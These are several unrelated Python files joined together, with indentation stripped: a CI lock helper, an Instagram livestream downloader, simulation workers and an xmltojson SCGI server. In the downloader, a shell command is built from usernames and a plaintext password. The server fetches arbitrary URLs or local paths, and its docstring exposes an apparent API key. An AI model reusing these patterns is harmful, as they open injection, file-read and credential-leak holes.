# Listing all files in lock folder
# Wrapping in 'list' operator because list_blobs return a generator which can only be iterated once
lock_files_ls = list(storage_client.list_blobs(BUCKET_NAME, prefix=f'{LOCKS_PATH}'))
current_integrations_lock_files = {}
# Getting all existing files details for integrations that we want to lock
for integration in integrations:
current_integrations_lock_files.update({integration: [lock_file_blob for lock_file_blob in lock_files_ls if
lock_file_blob.name == f'{LOCKS_PATH}/{integration}']})
# Filtering 'current_integrations_lock_files' from integrations with no files
current_integrations_lock_files = {integration: blob_files[0] for integration, blob_files in
current_integrations_lock_files.items() if blob_files}
return current_integrations_lock_files
def lock_expired(lock_file: storage.Blob, lock_timeout: str) -> bool:
"""
Checks if the time that passed since the creation of the 'lock_file' is more then 'lock_timeout'.
If not- it means that the integration represented by the lock file is currently locked and is tested in another build
Args:
lock_file: The lock file blob object
lock_timeout: The expiration timeout of the lock in seconds
Returns:
True if the lock has expired it's timeout, else False
"""
return datetime.datetime.now(tz=pytz.utc) - lock_file.updated >= datetime.timedelta(seconds=int(lock_timeout))
def main():
print("Time is: {}\n\n\n".format(datetime.datetime.now()))
tests_settings = options_handler()
# should be removed after solving: https://github.com/demisto/etc/issues/21383
# -------------
if 'master' in tests_settings.serverVersion.lower():
print('[{}] sleeping for 30 secs'.format(datetime.datetime.now()))
sleep(45)
# -------------
manage_tests(tests_settings)
if __name__ == '__main__':
main()
|
dlfuncs.py
|
import os
import shutil
import json
import threading
import time
from xml.dom.minidom import parseString
from instagram_private_api import ClientConnectionError
from instagram_private_api import ClientError
from instagram_private_api import ClientThrottledError
from instagram_private_api_extensions import live
from instagram_private_api_extensions import replay
try:
import logger
import helpers
import pil
import dlfuncs
import assembler
from constants import Constants
from comments import CommentsDownloader
except ImportError:
from . import logger
from . import helpers
from . import pil
from . import assembler
from . import dlfuncs
from .constants import Constants
from .comments import CommentsDownloader
def get_stream_duration(duration_type):
try:
# For some reason the published_time is roughly 40 seconds behind real world time
if duration_type == 0: # Airtime duration
stream_started_mins, stream_started_secs = divmod((int(time.time()) - pil.livestream_obj.get("published_time")), 60)
if duration_type == 1: # Download duration
stream_started_mins, stream_started_secs = divmod((int(time.time()) - int(pil.epochtime)), 60)
if duration_type == 2: # Missing duration
if (int(pil.epochtime) - pil.livestream_obj.get("published_time")) <= 0:
stream_started_mins, stream_started_secs = 0, 0 # Download started 'earlier' than actual broadcast, assume started at the same time instead
else:
stream_started_mins, stream_started_secs = divmod((int(pil.epochtime) - pil.livestream_obj.get("published_time")), 60)
if stream_started_mins < 0:
stream_started_mins = 0
if stream_started_secs < 0:
stream_started_secs = 0
stream_duration_str = '%d minutes' % stream_started_mins
if stream_started_secs:
stream_duration_str += ' and %d seconds' % stream_started_secs
return stream_duration_str
except Exception:
return "Not available"
def get_user_id():
is_user_id = False
user_id = None
try:
user_id = int(pil.dl_user)
is_user_id = True
except ValueError:
try:
user_res = pil.ig_api.username_info(pil.dl_user)
user_id = user_res.get('user', {}).get('pk')
except ClientConnectionError as cce:
logger.error(
"Could not get user info for '{:s}': {:d} {:s}".format(pil.dl_user, cce.code, str(cce)))
if "getaddrinfo failed" in str(cce):
logger.error('Could not resolve host, check your internet connection.')
if "timed out" in str(cce):
logger.error('The connection timed out, check your internet connection.')
except ClientThrottledError as cte:
logger.error(
"Could not get user info for '{:s}': {:d} {:s}".format(pil.dl_user, cte.code, str(cte)))
except ClientError as ce:
logger.error(
"Could not get user info for '{:s}': {:d} {:s}".format(pil.dl_user, ce.code, str(ce)))
if "Not Found" in str(ce):
logger.error('The specified user does not exist.')
except Exception as e:
logger.error("Could not get user info for '{:s}': {:s}".format(pil.dl_user, str(e)))
except KeyboardInterrupt:
logger.binfo("Aborted getting user info for '{:s}', exiting.".format(pil.dl_user))
if user_id and is_user_id:
logger.info("Getting info for '{:s}' successful. Assuming input is an user Id.".format(pil.dl_user))
logger.separator()
return user_id
elif user_id:
logger.info("Getting info for '{:s}' successful.".format(pil.dl_user))
logger.separator()
return user_id
else:
return None
def get_broadcasts_info():
try:
user_id = get_user_id()
if user_id:
broadcasts = pil.ig_api.user_story_feed(user_id)
pil.livestream_obj = broadcasts.get('broadcast')
pil.replays_obj = broadcasts.get('post_live_item', {}).get('broadcasts', [])
return True
else:
return False
except ClientThrottledError:
logger.error('Could not check because you are making too many requests at this time.')
return False
except Exception as e:
logger.error('Could not finish checking: {:s}'.format(str(e)))
if "timed out" in str(e):
logger.error('The connection timed out, check your internet connection.')
if "login_required" in str(e):
logger.error('Login cookie was loaded but user is not actually logged in. Delete the cookie file and try '
'again.')
return False
except KeyboardInterrupt:
logger.binfo('Aborted checking for livestreams and replays, exiting.')
return False
def merge_segments():
try:
if pil.run_at_finish:
try:
thread = threading.Thread(target=helpers.run_command, args=(pil.run_at_finish,))
thread.daemon = True
thread.start()
logger.binfo("Launched finish command: {:s}".format(pil.run_at_finish))
except Exception as e:
logger.warn('Could not execute command: {:s}'.format(str(e)))
live_mp4_file = '{}{}_{}_{}_{}_live.mp4'.format(pil.dl_path, pil.datetime_compat, pil.dl_user,
pil.livestream_obj.get('id'), pil.epochtime)
live_segments_path = os.path.normpath(pil.broadcast_downloader.output_dir)
if pil.segments_json_thread_worker and pil.segments_json_thread_worker.is_alive():
pil.kill_segment_thread = True
pil.segments_json_thread_worker.join()
if pil.comment_thread_worker and pil.comment_thread_worker.is_alive():
logger.info("Waiting for comment downloader to finish.")
pil.comment_thread_worker.join()
try:
if not pil.skip_merge:
logger.info('Merging downloaded files into video.')
pil.broadcast_downloader.stitch(live_mp4_file, cleartempfiles=pil.clear_temp_files)
logger.info('Successfully merged downloaded files into video.')
else:
logger.binfo("Merging of downloaded files has been disabled.")
logger.binfo("Use --assemble command to manually merge downloaded segments.")
if pil.clear_temp_files:
helpers.remove_temp_folder()
helpers.remove_lock()
except ValueError as e:
logger.separator()
logger.error('Could not merge downloaded files: {:s}'.format(str(e)))
if os.listdir(live_segments_path):
logger.separator()
logger.binfo("Segment directory is not empty. Trying to merge again.")
logger.separator()
pil.assemble_arg = live_mp4_file.replace(".mp4", "_downloads.json")
assembler.assemble(user_called=False)
else:
logger.separator()
logger.error("Segment directory is empty. There is nothing to merge.")
logger.separator()
helpers.remove_lock()
except Exception as e:
logger.error('Could not merge downloaded files: {:s}'.format(str(e)))
helpers.remove_lock()
except KeyboardInterrupt:
logger.binfo('Aborted merging process, no video was created.')
helpers.remove_lock()
def download_livestream():
try:
def print_status(sep=True):
if pil.do_heartbeat:
heartbeat_info = pil.ig_api.broadcast_heartbeat_and_viewercount(pil.livestream_obj.get('id'))
viewers = pil.livestream_obj.get('viewer_count', 0) + 1
if sep:
logger.separator()
else:
logger.info('Username : {:s}'.format(pil.dl_user))
logger.info('Viewers : {:s} watching'.format(str(int(viewers))))
logger.info('Airing time : {:s}'.format(get_stream_duration(0)))
if pil.do_heartbeat:
logger.info('Status : {:s}'.format(heartbeat_info.get('broadcast_status').title()))
return heartbeat_info.get('broadcast_status') not in ['active', 'interrupted']
else:
return None
mpd_url = (pil.livestream_obj.get('dash_manifest')
or pil.livestream_obj.get('dash_abr_playback_url')
or pil.livestream_obj.get('dash_playback_url'))
pil.live_folder_path = '{}{}_{}_{}_{}_live_downloads'.format(pil.dl_path, pil.datetime_compat, pil.dl_user,
pil.livestream_obj.get('id'), pil.epochtime)
pil.broadcast_downloader = live.Downloader(
mpd=mpd_url,
output_dir=pil.live_folder_path,
user_agent=pil.ig_api.user_agent,
max_connection_error_retry=3,
duplicate_etag_retry=30,
callback_check=print_status,
mpd_download_timeout=3,
download_timeout=3,
ffmpeg_binary=pil.ffmpeg_path)
except Exception as e:
logger.error('Could not start downloading livestream: {:s}'.format(str(e)))
logger.separator()
helpers.remove_lock()
try:
broadcast_owner = pil.livestream_obj.get('broadcast_owner', {}).get('username')
try:
broadcast_guest = pil.livestream_obj.get('cobroadcasters', {})[0].get('username')
except Exception:
broadcast_guest = None
if broadcast_owner != pil.dl_user:
logger.binfo('This livestream is a dual-live, the owner is "{}".'.format(broadcast_owner))
broadcast_guest = None
if broadcast_guest:
logger.binfo('This livestream is a dual-live, the current guest is "{}".'.format(broadcast_guest))
pil.has_guest = broadcast_guest
logger.separator()
print_status(False)
logger.separator()
helpers.create_lock_folder()
pil.segments_json_thread_worker = threading.Thread(target=helpers.generate_json_segments)
pil.segments_json_thread_worker.start()
logger.info('Downloading livestream, press [CTRL+C] to abort.')
if pil.run_at_start:
try:
thread = threading.Thread(target=helpers.run_command, args=(pil.run_at_start,))
thread.daemon = True
thread.start()
logger.binfo("Launched start command: {:s}".format(pil.run_at_start))
except Exception as e:
logger.warn('Could not launch command: {:s}'.format(str(e)))
if pil.dl_comments:
try:
comments_json_file = '{}{}_{}_{}_{}_live_comments.json'.format(
pil.dl_path, pil.datetime_compat, pil.dl_user, pil.livestream_obj.get('id'), pil.epochtime)
pil.comment_thread_worker = threading.Thread(target=get_live_comments, args=(comments_json_file,))
pil.comment_thread_worker.start()
except Exception as e:
logger.error('An error occurred while downloading comments: {:s}'.format(str(e)))
pil.broadcast_downloader.run()
logger.separator()
logger.info("The livestream has been ended by the user.")
logger.separator()
logger.info('Airtime duration : {}'.format(get_stream_duration(0)))
logger.info('Download duration : {}'.format(get_stream_duration(1)))
logger.info('Missing (approx.) : {}'.format(get_stream_duration(2)))
logger.separator()
merge_segments()
except KeyboardInterrupt:
logger.separator()
logger.binfo('The download has been aborted.')
logger.separator()
logger.info('Airtime duration : {}'.format(get_stream_duration(0)))
logger.info('Download duration : {}'.format(get_stream_duration(1)))
logger.info('Missing (approx.) : {}'.format(get_stream_duration(2)))
logger.separator()
if not pil.broadcast_downloader.is_aborted:
pil.broadcast_downloader.stop()
merge_segments()
def download_replays():
try:
try:
logger.info('Amount of replays : {:s}'.format(str(len(pil.replays_obj))))
for replay_index, replay_obj in enumerate(pil.replays_obj):
bc_dash_manifest = parseString(replay_obj.get('dash_manifest')).getElementsByTagName('Period')
bc_duration_raw = bc_dash_manifest[0].getAttribute("duration")
bc_minutes = (bc_duration_raw.split("H"))[1].split("M")[0]
bc_seconds = ((bc_duration_raw.split("M"))[1].split("S")[0]).split('.')[0]
logger.info(
'Replay {:s} duration : {:s} minutes and {:s} seconds'.format(str(replay_index + 1), bc_minutes,
bc_seconds))
except Exception as e:
logger.warn("An error occurred while getting replay duration information: {:s}".format(str(e)))
logger.separator()
logger.info("Downloading replays, press [CTRL+C] to abort.")
logger.separator()
for replay_index, replay_obj in enumerate(pil.replays_obj):
exists = False
pil.livestream_obj = replay_obj
dl_path_files = os.listdir(pil.dl_path)
for dl_path_file in dl_path_files:
if (str(replay_obj.get('id')) in dl_path_file) and ("_replay" in dl_path_file) and (dl_path_file.endswith(".mp4")):
logger.binfo("Already downloaded replay {:d} with ID '{:s}'.".format(replay_index + 1, str(replay_obj.get('id'))))
exists = True
if not exists:
current = replay_index + 1
logger.info(
"Downloading replay {:s} of {:s} with ID '{:s}'.".format(str(current), str(len(pil.replays_obj)),
str(replay_obj.get('id'))))
pil.live_folder_path = '{}{}_{}_{}_{}_replay_downloads'.format(
pil.dl_path, pil.datetime_compat, pil.dl_user, pil.livestream_obj.get('id'), replay_obj.get("published_time"))
broadcast_downloader = replay.Downloader(
mpd=replay_obj.get('dash_manifest'),
output_dir=pil.live_folder_path,
user_agent=pil.ig_api.user_agent,
ffmpeg_binary=pil.ffmpeg_path)
if pil.use_locks:
helpers.create_lock_folder()
replay_mp4_file = '{}{}_{}_{}_{}_replay.mp4'.format(
pil.dl_path, pil.datetime_compat, pil.dl_user, pil.livestream_obj.get('id'), replay_obj.get("published_time"))
comments_json_file = '{}{}_{}_{}_{}_replay_comments.json'.format(
pil.dl_path, pil.datetime_compat, pil.dl_user, pil.livestream_obj.get('id'), replay_obj.get("published_time"))
pil.comment_thread_worker = threading.Thread(target=get_replay_comments, args=(comments_json_file,))
broadcast_downloader.download(replay_mp4_file, cleartempfiles=pil.clear_temp_files)
if pil.clear_temp_files:
helpers.remove_temp_folder()
if pil.dl_comments:
logger.info("Downloading replay comments.")
try:
get_replay_comments(comments_json_file)
except Exception as e:
logger.error('An error occurred while downloading comments: {:s}'.format(str(e)))
logger.info("Finished downloading replay {:s} of {:s}.".format(str(current), str(len(pil.replays_obj))))
helpers.remove_lock()
if current != len(pil.replays_obj):
logger.separator()
logger.separator()
logger.info("Finished downloading all available replays.")
helpers.remove_lock()
except Exception as e:
logger.error('Could not save replay: {:s}'.format(str(e)))
helpers.remove_lock()
except KeyboardInterrupt:
logger.separator()
logger.binfo('The download has been aborted by the user, exiting.')
helpers.remove_temp_folder()
helpers.remove_lock()
def download_following():
try:
is_checking = ''
if pil.dl_lives and pil.dl_replays:
is_checking = 'livestreams or replays'
elif pil.dl_lives and not pil.dl_replays:
is_checking = 'livestreams'
elif not pil.dl_lives and pil.dl_replays:
is_checking = 'replays'
logger.info("Checking following users for any {:s}.".format(is_checking))
broadcast_f_list = pil.ig_api.reels_tray()
usernames_available_livestreams = []
usernames_available_replays = []
if broadcast_f_list['broadcasts'] and pil.dl_lives:
for broadcast_f in broadcast_f_list['broadcasts']:
username = broadcast_f['broadcast_owner']['username']
if username not in usernames_available_livestreams:
usernames_available_livestreams.append(username)
if broadcast_f_list.get('post_live', {}).get('post_live_items', []) and pil.dl_replays:
for broadcast_r in broadcast_f_list.get('post_live', {}).get('post_live_items', []):
for broadcast_f in broadcast_r.get("broadcasts", []):
username = broadcast_f['broadcast_owner']['username']
if username not in usernames_available_replays:
usernames_available_replays.append(username)
logger.separator()
available_total = list(usernames_available_livestreams)
available_total.extend(x for x in usernames_available_replays if x not in available_total)
if available_total:
logger.info("The following users have available {:s}.".format(is_checking))
logger.info(', '.join(available_total))
logger.separator()
iterate_users(available_total)
else:
logger.info("There are currently no available {:s}.".format(is_checking))
logger.separator()
except Exception as e:
logger.error("Could not finish checking following users: {:s}".format(str(e)))
except KeyboardInterrupt:
logger.separator()
logger.binfo('The checking process has been aborted by the user.')
logger.separator()
def iterate_users(user_list):
for user in user_list:
try:
if os.path.isfile(os.path.join(pil.dl_path, user + '.lock')):
logger.warn("Lock file is already present for '{:s}', there is probably another download "
"ongoing!".format(user))
logger.warn(
"If this is not the case, manually delete the file '{:s}' and try again.".format(user + '.lock'))
else:
logger.info("Launching daemon process for '{:s}'.".format(user))
start_result = helpers.run_command("{:s} -d {:s} -cp '{:s}' -dp '{:s}' {:s} {:s} {:s} {:s}".format(
("'" + pil.winbuild_path + "'") if pil.winbuild_path else "pyinstalive",
user,
pil.config_path,
pil.dl_path,
'--no-lives' if not pil.dl_lives else '',
'--no-replays' if not pil.dl_replays else '',
'--no-heartbeat' if not pil.do_heartbeat else '',
'--username {:s} --password {:s}'.format(pil.ig_user, pil.ig_pass) if pil.config_login_overridden else ''))
if start_result:
logger.warn("Could not start process: {:s}".format(str(start_result)))
else:
logger.info("Process started successfully.")
logger.separator()
time.sleep(2)
except Exception as e:
logger.warn("Could not start process: {:s}".format(str(e)))
except KeyboardInterrupt:
logger.binfo('The process launching has been aborted by the user.')
logger.separator()
break
def get_live_comments(comments_json_file):
try:
comments_downloader = CommentsDownloader(destination_file=comments_json_file)
first_comment_created_at = 0
try:
while not pil.broadcast_downloader.is_aborted:
if 'initial_buffered_duration' not in pil.livestream_obj and pil.broadcast_downloader.initial_buffered_duration:
pil.livestream_obj['initial_buffered_duration'] = pil.broadcast_downloader.initial_buffered_duration
comments_downloader.broadcast = pil.livestream_obj
first_comment_created_at = comments_downloader.get_live(first_comment_created_at)
except ClientError as e:
if not 'media has been deleted' in e.error_response:
logger.warn("Comment collection ClientError: %d %s" % (e.code, e.error_response))
try:
if comments_downloader.comments:
comments_downloader.save()
comments_log_file = comments_json_file.replace('.json', '.log')
comment_errors, total_comments = CommentsDownloader.generate_log(
comments_downloader.comments, pil.epochtime, comments_log_file,
comments_delay=pil.broadcast_downloader.initial_buffered_duration)
if len(comments_downloader.comments) == 1:
logger.info("Successfully saved 1 comment.")
#os.remove(comments_json_file)
logger.separator()
return True
else:
if comment_errors:
logger.warn(
"Successfully saved {:s} comments but {:s} comments are (partially) missing.".format(
str(total_comments), str(comment_errors)))
else:
logger.info("Successfully saved {:s} comments.".format(str(total_comments)))
#os.remove(comments_json_file)
logger.separator()
return True
else:
logger.info("There are no available comments to save.")
logger.separator()
return False
except Exception as e:
logger.error('Could not save comments: {:s}'.format(str(e)))
return False
except KeyboardInterrupt as e:
logger.binfo("Downloading livestream comments has been aborted.")
return False
def get_replay_comments(comments_json_file):
try:
comments_downloader = CommentsDownloader(destination_file=comments_json_file)
comments_downloader.get_replay()
try:
if comments_downloader.comments:
comments_log_file = comments_json_file.replace('.json', '.log')
comment_errors, total_comments = CommentsDownloader.generate_log(
comments_downloader.comments, pil.livestream_obj.get('published_time'), comments_log_file,
comments_delay=0)
if total_comments == 1:
logger.info("Successfully saved 1 comment to logfile.")
#os.remove(comments_json_file)
logger.separator()
return True
else:
if comment_errors:
logger.warn(
"Successfully saved {:s} comments but {:s} comments are (partially) missing.".format(
str(total_comments), str(comment_errors)))
else:
logger.info("Successfully saved {:s} comments.".format(str(total_comments)))
#os.remove(comments_json_file)
logger.separator()
return True
else:
logger.info("There are no available comments to save.")
return False
except Exception as e:
logger.error('Could not save comments to logfile: {:s}'.format(str(e)))
return False
except KeyboardInterrupt as e:
logger.binfo("Downloading replay comments has been aborted.")
return False
|
box_pushing_workers.py
|
import multiprocessing
import time
from qsim.simulator import QuasistaticSimParameters
from qsim.system import cpp_params_from_py_params
try:
from irs_lqr.quasistatic_dynamics import *
from zmq_parallel_cmp.array_io import *
except ImportError:
from irs_lqr.irs_lqr.quasistatic_dynamics import *
from irs_lqr.zmq_parallel_cmp.array_io import *
# TODO: make workers system-agnostic. Maybe passsing in a yml file describing
# the sytem from the command line?
from box_pushing_setup import *
def f_worker(lock: multiprocessing.Lock):
context = zmq.Context()
# Socket to receive messages on
receiver = context.socket(zmq.PULL)
receiver.connect("tcp://localhost:5557")
# Socket to send messages to
sender = context.socket(zmq.PUSH)
sender.connect("tcp://localhost:5558")
pid = multiprocessing.current_process().pid
print("worker", pid, "ready.")
sim_params = QuasistaticSimParameters(
gravity=gravity,
nd_per_contact=2,
contact_detection_tolerance=contact_detection_tolerance,
is_quasi_dynamic=True)
q_sim_py = QuasistaticSimulator(
model_directive_path=model_directive_path,
robot_stiffness_dict=robot_stiffness_dict,
object_sdf_paths=object_sdf_dict,
sim_params=sim_params,
internal_vis=False)
sim_params_cpp = cpp_params_from_py_params(sim_params)
sim_params_cpp.gradient_lstsq_tolerance = gradient_lstsq_tolerance
q_sim_cpp = QuasistaticSimulatorCpp(
model_directive_path=model_directive_path,
robot_stiffness_str=robot_stiffness_dict,
object_sdf_paths=object_sdf_dict,
sim_params=sim_params_cpp)
q_dynamics = QuasistaticDynamics(h=h, q_sim_py=q_sim_py, q_sim=q_sim_cpp)
# Process tasks forever
i_tasks = 0
while True:
x_u_nominal, t_list, n_samples, std = recv_array(receiver)
assert len(x_u_nominal.shape) == 2
x_nominals = x_u_nominal[:, :q_dynamics.dim_x]
u_nominals = x_u_nominal[:, q_dynamics.dim_x:]
ABhat = q_dynamics.calc_AB_batch(
x_nominals=x_nominals,
u_nominals=u_nominals,
n_samples=n_samples,
std_u=std,
mode=gradient_mode)
# Send results to sink
send_array(sender, A=ABhat, t=t_list, n_samples=-1, std=[-1])
i_tasks += 1
if i_tasks % 10 == 0:
lock.acquire()
print(pid, "has processed", i_tasks, "tasks.")
lock.release()
if __name__ == "__main__":
p_list = []
try:
lock = multiprocessing.Lock()
for _ in range(28):
p = multiprocessing.Process(target=f_worker, args=(lock,))
p_list.append(p)
p.start()
time.sleep(100000)
except KeyboardInterrupt:
for p in p_list:
p.terminate()
p.join()
|
__main__.py
|
# coding: utf-8
__appname__ = "xmltojson"
__version__ = "17.191.1220" #добавлена обработка POST запроса
#__version__ = "17.181.1520" #первая редакция
__profile__ = ""
__index__ =-1
import sys
sys.PY3 = sys.version_info[0] > 2
if not sys.PY3:
input = raw_input
import os, time
import traceback
import socket
__hostname__ = socket.gethostname().lower()
import threading, random, subprocess
if sys.PY3:
from urllib.parse import unquote
else:
from urllib import unquote
import uuid
import glob
import gzip
import shutil
import hashlib
from lockfile import LockWait
APPCONF = {
"params": [],
"kwargs": {},
#"hostname": socket.gethostname().lower(),
"addr": ("127.0.0.1", 0),
"nginx": {
"location": "/ms71/conf/location",
"upstream": "/ms71/conf/upstream",
},
}
def main():
rc = 0
try:
APPCONF["params"], APPCONF["kwargs"] = handle_commandline()
APPCONF["addr"] = APPCONF["kwargs"].pop("addr", APPCONF["addr"])
serve_forever(APPCONF["addr"], application, init)
except KeyboardInterrupt as e:
pass
except SystemExit as e:
if e:
rc = e.code
except:
log(traceback.format_exc(), kind="error")
finally:
try:
finit()
except:
log(traceback.format_exc(), kind="error:finit")
os._exit(rc)
def application(env):
"""
CONTENT_ENCODING = <class 'str'> gzip
CONTENT_LENGTH = <class 'int'> 5421
CONTENT_TYPE = <class 'str'> application/json
HTTP_KWARGS = <class 'dict'> {}
HTTP_METHOD = <class 'str'> POST
HTTP_PARAMS = <class 'list'> []
REMOTE_ADDR = <class 'str'> 79.104.1.86
REMOTE_PORT = <class 'str'> 65083
ROOT = <class 'str'> /usr/share/nginx/html
SCGI = <class 'str'> 1
SERVER_NAME = <class 'str'> online365.pro
SERVER_PORT = <class 'str'> 443
URI = <class 'str'> /sgg/
X-API-KEY = <class 'str'> 80a3fd3ba997493f837894f1af803216
X-BODY-FILE = <class 'str'> /usr/share/nginx/temp/0000000005
scgi.defer = <class 'NoneType'> None
scgi.initv = <class 'list'> [('127.0.0.1', 50703), 6113]
scgi.rfile = <class '_io.BufferedReader'> <_io.BufferedReader name=5>
scgi.wfile = <class 'socket.SocketIO'> <socket.SocketIO object at 0x7f90edc44240>
"""
from lib.xmltojson import main as main2
import itertools
import zlib
addr, pid = env["scgi.initv"][:2]
msg = f'{addr[0]} {addr[1]} {env["HTTP_METHOD"]} {env["URI"]} {env["HTTP_PARAMS"]} {env["HTTP_KWARGS"]}'
env["scgi.defer"] = lambda: log("%s close" % msg)
log(msg)
#добавляем чтоб постом можно было пеедавать строку для конвертации
content = u"""Манускрипт.Онлайн
Сервис XMLtoJSON преобразует XML документ в JSON
Пример использования (метод GET):
http://online365.pro/xmltojson?/ms71/data/filename.xml - локальный файл
http://online365.pro/xmltojson?http://www.hostname.org/qqwtrtr7646gfyjy.xml - url файла
Пример использования (метод POST):
http://online365.pro/xmltojson
в теле запроса - xml строка
методо сжатия deflate
возвращает сроку JSON
""".encode()
fg_head = True
data = None
_rm = env["HTTP_METHOD"].upper()
arg=None
if 'GET' == _rm:
_qs = env["HTTP_PARAMS"]
g = (v.strip() for v in itertools.chain.from_iterable(item.split(',') for item in _qs))
args = list(filter(lambda x: x, g))
try:
arg = args.pop(0)
except Exception as Err:
#print(Err)
pass
elif 'POST' == _rm:
arg = env['scgi.rfile'].read(env['CONTENT_LENGTH'])
try:
arg = zlib.decompress(arg)
except Exception as Err:
#log(Err)
pass
if arg:
fg_head = False
data = main2(arg)
header = head(len(content), False, True)
if not fg_head:
if data:
content = data.encode()
header = head(len(content), True, False)
else:
content = u"something wrong".encode()
header = head(len(content), False, True)
# три обязательных вызова yield: статус, заголовки, содержание
yield '200 OK'
yield header
yield content
def head(aContentLength, fgDeflate=True, fg_head=False):
aLastModified = time.strftime('%a, %d %b %Y %X GMT', time.gmtime())
r = []
r.append(("Last-Modified", "%s" % aLastModified))
r.append(("Content-Length", "%i" % aContentLength))
r.append(("X-Accel-Buffering", "no"))
if fg_head:
r.append(("Cache-Control", "no-cache"))
r.append(("Content-Type", "text/plain; charset=UTF-8"))
else:
r.append(("Content-Disposition", "attachment; filename=document.json"))
r.append(("Content-Type", "application/octet-stream"))
if fgDeflate:
r.append(("Content-Encoding", "deflate"))
return r
def init(sock):
addr = sock.getsockname()[:2]
sock.listen(100)
APPCONF["addr"] = addr
fileupstream = _getfilename("upstream")
APPCONF["fileupstream"] = fileupstream
data = """location /xmltojson {
limit_except GET POST{
deny all;
}
include scgi_params;
scgi_param X-BODY-FILE $request_body_file;
scgi_param X-API-KEY $http_x_api_key;
scgi_pass xmltojson_scgi;
scgi_buffering off;
scgi_cache off;
}
"""
filelocation = _getfilename("location")
dn = os.path.dirname(filelocation)
bs = os.path.basename(filelocation)
_filelocation = os.path.join(dn, bs.split('.', 1)[0].split('-', 1)[0]) # общий файл для всех экземпляров приложения
with open(_filelocation, "wb") as f:
f.write(data.encode())
APPCONF["filelocation"] = _filelocation
dn = os.path.dirname(fileupstream)
bs = os.path.basename(fileupstream)
_fileupstream = os.path.join(dn, bs.split('.', 1)[0].split('-', 1)[0]) # общий файл для всех экземпляров приложения
_fileupstreamlock = bs.split('.', 1)[0].split('-', 1)[0] # _fileupstream + '.lock'
data1 = """upstream xmltojson_scgi { least_conn;
server %s:%s; # %s
}
""" % (addr[0], addr[1], bs)
data2 = """# server %s:%s; # %s""" % (addr[0], addr[1], bs)
with LockWait(_fileupstreamlock):
if os.path.exists(_fileupstream):
with open(_fileupstream, "rb") as f:
src = f.read().decode().rstrip().splitlines()
# + ' ' + data[1:] + '\n}\n'
_find = "# %s" % bs
# fg - пердполагаем, что надо добавлять свой апстрим
fg = True
for i in range(1, len(src)-1):
if src[i].find(_find) >-1:
fg = False
src[i] = ' ' + data2[1:]
break
if fg:
src[len(src)-1] = ' ' + data2[1:] + '\n}\n'
src = '\n'.join(src)
with open(_fileupstream, "wb") as f:
f.write(src.encode())
else:
with open(_fileupstream, "wb") as f:
f.write(data1.encode())
rc = 0
rc = subprocess.call(['sudo', 'nginx', '-t', '-c', '/ms71/saas.conf', '-p', '/ms71/'])
if 0 == rc:
rc = subprocess.call(['sudo', 'nginx', '-s', 'reload', '-c', '/ms71/saas.conf', '-p', '/ms71/'])
if 0 == rc:
log("%s:%s running" % addr)
return [addr, os.getpid()]
raise SystemExit(rc)
def _getfilename(name):
filename = ""
if __index__ > -1:
if __profile__:
filename = os.path.join(APPCONF["nginx"][name], "%s-%s.%s" % (__appname__, __index__, __profile__))
else:
filename = os.path.join(APPCONF["nginx"][name], "%s-%s" % (__appname__, __index__))
else:
if __profile__:
filename = os.path.join(APPCONF["nginx"][name], "%s.%s" % (__appname__, __profile__))
else:
filename = os.path.join(APPCONF["nginx"][name], __appname__)
return filename
def finit():
fileupstream = APPCONF.get("fileupstream")
if fileupstream is None:
log("%s:%s critical" % APPCONF["addr"], begin='')
return
try:
os.remove(fileupstream)
except: pass
dn = os.path.dirname(fileupstream)
bs = os.path.basename(fileupstream)
_fileupstream = os.path.join(dn, bs.split('.', 1)[0].split('-', 1)[0])
_fileupstreamlock = bs.split('.', 1)[0].split('-', 1)[0] # _fileupstream + '.lock'
with LockWait(_fileupstreamlock):
_find = "# %s" % bs
src = ""
fg_noapp = True
if os.path.exists(_fileupstream):
with open(_fileupstream, "rb") as f:
src = f.read().decode().rstrip().splitlines()
for i in range(1, len(src)-1):
if src[i].find(_find) >-1:
src.pop(i)
break
fg_noapp = 0 == len(src[1:-1])
if fg_noapp: # нет запущенных приложений, удаляем общую локацию и апстрим
try:
os.remove(APPCONF["filelocation"])
except: pass
try:
os.remove(_fileupstream)
except: pass
else:
src = '\n'.join(src)
with open(_fileupstream, "wb") as f:
f.write(src.encode())
subprocess.call(['sudo', 'nginx', '-s', 'reload', '-c', '/ms71/saas.conf', '-p', '/ms71/'])
log("%s:%s shutdown" % APPCONF["addr"], begin='')
def serve_forever(addr, handle_request, init=None):
sock = None
if type(addr) is str:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(addr)
#sock.listen(10)
initial_value = None
if init:
if callable(init):
initial_value = init(sock)
else:
initial_value = init
try:
while True:
_conn, _addr = sock.accept()
_t = threading.Thread(target=_handle_conn, args=(_conn, _addr, handle_request, initial_value))
_t.env = None
_t.daemon = True
_t.start()
finally:
try: sock.close()
except: pass
def _handle_conn(conn, addr, handle_request, initial_value):
env = None
try:
conn.settimeout(1)
rfile = conn.makefile("rb", -1)
wfile = conn.makefile("wb", 0)
env = _env_read(rfile)
env = _args_parse(env)
#env["scgi.connection"] = conn
#env["scgi.address"] = addr
env["scgi.defer"] = None
env["scgi.initv"] = initial_value
env["scgi.rfile"] = rfile
env["scgi.wfile"] = wfile
env["CONTENT_LENGTH"] = int(env["CONTENT_LENGTH"])
threading.current_thread().env = env
g = handle_request(env)
wfile.write("Status: {0}\r\n".format(g.__next__()).encode())
wfile.flush()
for kv in g.__next__():
wfile.write(": ".join(kv).encode())
wfile.write(b"\r\n")
wfile.write(b"\r\n")
wfile.flush()
for data in g:
wfile.write(data)
wfile.flush()
except (BrokenPipeError) as e:
pass
except:
print(conn, file=sys.stderr)
print(env, file=sys.stderr)
traceback.print_exc()
finally:
if not wfile.closed:
try: wfile.flush()
except: pass
try: wfile.close()
except: pass
try: rfile.close()
except: pass
try: conn.shutdown(socket.SHUT_WR)
except: pass
try: conn.close()
except: pass
if env and env.get("scgi.defer"):
try:
env["scgi.defer"]()
except:
log(traceback.format_exc(), kind="error:defer")
# netstring utility functions
def _env_read(f):
size, d = f.read(16).split(b':', 1)
size = int(size)-len(d)
if size > 0:
s = f.read(size)
if not s:
raise IOError('short netstring read')
if f.read(1) != b',':
raise IOError('missing netstring terminator')
items = b"".join([d, s]).split(b'\0')[:-1]
else:
raise IOError('missing netstring size')
assert len(items) % 2 == 0, "malformed headers"
env = {}
while items:
v = items.pop()
k = items.pop()
env[k.decode()] = v.decode()
return env
